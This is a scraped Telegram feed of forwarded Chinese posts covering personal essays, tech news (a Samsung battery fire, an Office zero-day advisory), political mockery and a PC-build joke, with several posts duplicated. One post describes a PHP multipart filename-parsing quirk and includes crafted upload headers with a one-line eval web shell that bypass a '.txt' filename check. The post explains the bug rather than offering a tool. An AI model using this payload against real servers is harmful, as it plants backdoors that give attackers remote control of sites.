Forwarded from 布告栏上的贴纸
上海的房子只需要一年就能让你损失一百万,一个学生买点自己喜欢的玩具,带喜欢的女孩出去的时候住一下万豪希尔顿,这么过上四年能花掉几个钱?
当上社畜以后,再多的钱,能买回来那时候的快乐吗?我在绝大多数时候都觉得自己是心理健全的,没有被影响到,但是直到现在,去吃麦当劳的时候,还是会偶尔想起那个窘迫的小学生。出去旅游的时候,躺在W酒店的大床上,会想起那个女孩子跟我挤在快捷酒店的小床上有说有笑的看游戏直播,她对我说等我工作了给你买你最喜欢的雷蛇灵刃,每每这时都会觉得眼泪仿佛下一秒就会流出来。我现在可以随时走进店里买一部顶配的雷蛇灵刃,但我再也不想买它了
https://telegra.ph/那些被穷养的男生长大后性格怎么样-01-16
Telegraph
那些被穷养的男生长大后性格怎么样?
我自己就是穷养男孩思维的受害者,评价是如果你脑子没坏,就不要信这一套。 我出生于华东地区的一个普通小县城,从小住在那个县城核心区域的镇子,外公是这个镇子的镇长,妈妈是妇联主席,爸爸在县中任职,全家体制内。 现在回首,会觉得这个配置毫无疑问是小县城婆罗门,然而你知道我初中的时候最羡慕的是谁吗?是我那个爸爸卖煎饼,妈妈开服装店的同桌,因为他零花钱总比我多,而且有免费的煎饼吃。 我外公一直贯彻吃得苦中苦方为人上人的念头,并传染给了我妈,从小时候我就几乎没有什么零花钱,小学五年级的时候,我有一次去市里找上高中的…
组个万元机,请大家帮忙看看配置
CPU:无
内存:英睿达DDR5 6400 64GB*2 11999元
显卡:无
硬盘:SN850X 8TB 13929元
电源:无
散热:无
机箱:无
CPU:无
内存:英睿达DDR5 6400 64GB*2 11999元
显卡:无
硬盘:SN850X 8TB 13929元
电源:无
散热:无
机箱:无
Forwarded from 科技圈🎗在花频道📮
三星承认 Galaxy S25 Plus 爆炸事故责任,同意赔偿用户损失
三星电子已承认一起 Galaxy S25 Plus 爆炸事故的责任,并同意向受害用户提供赔偿。该事故发生于 2025 年 11 月,一部使用仅两个月的 Galaxy S25 Plus 在美国印第安纳州一户家庭中充电时发生爆炸起火,烧穿地毯并导致全家人因吸入烟雾而需就医治疗。
当地消防部门的调查报告确认这是一起电池热失控事件。经过约两个月的内部调查后,三星同意承担手机费用、医疗账单和清理费用,并向每位受影响家庭成员提供 500 美元的精神损失费。不过三星在最新声明中表示,其分析认为外力是事故原因,但证据不足以确定具体责任方。目前尚无证据显示 Galaxy S25 系列存在大规模电池过热问题。
Android Authority
🍀在花频道 🍵茶馆聊天 📮投稿
三星电子已承认一起 Galaxy S25 Plus 爆炸事故的责任,并同意向受害用户提供赔偿。该事故发生于 2025 年 11 月,一部使用仅两个月的 Galaxy S25 Plus 在美国印第安纳州一户家庭中充电时发生爆炸起火,烧穿地毯并导致全家人因吸入烟雾而需就医治疗。
当地消防部门的调查报告确认这是一起电池热失控事件。经过约两个月的内部调查后,三星同意承担手机费用、医疗账单和清理费用,并向每位受影响家庭成员提供 500 美元的精神损失费。不过三星在最新声明中表示,其分析认为外力是事故原因,但证据不足以确定具体责任方。目前尚无证据显示 Galaxy S25 系列存在大规模电池过热问题。
Android Authority
🍀在花频道 🍵茶馆聊天 📮投稿
谨防“数字泔水”侵蚀年轻大脑
https://mp.weixin.qq.com/s/RxXZUEKI4BpTmc7DDUxpRA
https://mp.weixin.qq.com/s/RxXZUEKI4BpTmc7DDUxpRA
Forwarded from 论一个沙雕网友一天到晚都在看什么怪东西 (Pineapple 🍍)
365 WINS IN 365 DAYS: President Trump’s Return Marks New Era of Success, Prosperity
365天 365贏:特朗普总统回归标志着成功与繁荣的新时代
我操这可太TM赢了,给我都看绷不住了
The White House
365天 365贏:特朗普总统回归标志着成功与繁荣的新时代
245. Signed an executive order to end the use of paper straws.
245. 签署行政命令,禁止使用纸吸管。
我操这可太TM赢了,给我都看绷不住了
The White House
Forwarded from Puddin在TG上看到了啥
3. PHP读取上传文件的实现也有bug,因为随便截断内容而导致上传的文件名不一致
上传文件时,可以把filename和name写在下一行,这是RFC要求的
而且filename和name可以出现多次,默认取最后一个
这样写,最后上传的是a.txt而不是a.php,注意filename="a.txt"写在新的一行
但是如果把上面xxx换成五千多个x
最后上传的就是a.php而不是a.txt
怎么多加了几个x结果就不一样了,他们代码到底是怎么写的
上传文件时,可以把filename和name写在下一行,这是RFC要求的
而且filename和name可以出现多次,默认取最后一个
Content-Disposition: xxx; filename="a.php" name="file"
filename="a.txt"
<?php eval($_POST[1]);?>
这样写,最后上传的是a.txt而不是a.php,注意filename="a.txt"写在新的一行
但是如果把上面xxx换成五千多个x
Content-Disposition: 假装这里有五千多个x; filename="a.php" name="file"
filename="a.txt"
<?php eval($_POST[1]);?>
最后上传的就是a.php而不是a.txt
怎么多加了几个x结果就不一样了,他们代码到底是怎么写的
Forwarded from Yummy 😋
Office漏洞正被黑客大量利用,2016、2019、2021、365全中招
微软近日发现了一个严重的Office零日漏洞(CVE-2026-21509),该漏洞已被黑客广泛利用,用户仅需打开恶意Office文件,系统就可能被远程控制。
据微软介绍,该漏洞在(CVSS)中得分为7.8/10,属于高风险等级,该漏洞源于Office底层设计缺陷,导致Office错误地信任了某些不应被信任的输入数据。
黑客可以利用这一漏洞制作带有恶意代码的Office文件,绕过OLE安全防护机制,从而在用户打开文件时远程执行恶意代码。
对于Office 2021和Microsoft 365用户,可以通过在线更新获得修复,但需要重启系统后才能生效。
较旧的Office 2016和Office 2019版本用户需要手动下载以下版本的更新文件:
🗒 标签: #微软 #Office
📢 频道: @GodlyNews1
🤖 投稿: @GodlyNewsBot
微软近日发现了一个严重的Office零日漏洞(CVE-2026-21509),该漏洞已被黑客广泛利用,用户仅需打开恶意Office文件,系统就可能被远程控制。
据微软介绍,该漏洞在(CVSS)中得分为7.8/10,属于高风险等级,该漏洞源于Office底层设计缺陷,导致Office错误地信任了某些不应被信任的输入数据。
黑客可以利用这一漏洞制作带有恶意代码的Office文件,绕过OLE安全防护机制,从而在用户打开文件时远程执行恶意代码。
对于Office 2021和Microsoft 365用户,可以通过在线更新获得修复,但需要重启系统后才能生效。
较旧的Office 2016和Office 2019版本用户需要手动下载以下版本的更新文件:
* Microsoft Office 2019(32位版本):16.0.10417.20095
* Microsoft Office 2019(64位版本):16.0.10417.20095
* Microsoft Office 2016(32位版本):16.0.5539.1001
* Microsoft Office 2016(64位版本):16.0.5539.1001
Please open Telegram to view this post
VIEW IN TELEGRAM